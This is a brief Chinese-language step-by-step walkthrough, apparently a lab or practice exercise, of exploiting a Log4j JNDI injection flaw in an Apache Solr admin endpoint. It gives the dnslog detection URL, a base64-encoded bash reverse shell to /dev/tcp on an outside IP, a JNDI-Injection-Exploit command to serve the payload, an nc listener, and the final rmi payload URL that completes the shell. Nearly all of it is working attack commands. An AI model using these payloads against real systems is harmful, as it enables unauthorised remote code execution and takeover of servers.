在dns.log生成一个网址
将得到的网址上传上去
http://39.105.61.160:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.6tioul.dnslog.cn}
得到回显,表示操作已执行,证明漏洞存在
在云服务器上构建恶意的类
将要执行的恶意操作的代码进行base64编码
bash -i>& /dev/tcp/39.105.61.160/8888 0>&1
将代码放到云服务器执行
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaT4mIC9kZXYvdGNwLzM5LjEwNS42MS4xNjAvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" -A "39.105.61.160"
再开一个云服务器,监听8888端口
nc -lvvp 8888
将此代码送去执行
http://39.105.61.160:8983/solr/admin/cores?action=${jndi:rmi://38.105.61.160:1099/1v8x0q}
之后再监听的云服务器得到消息,完成反弹shell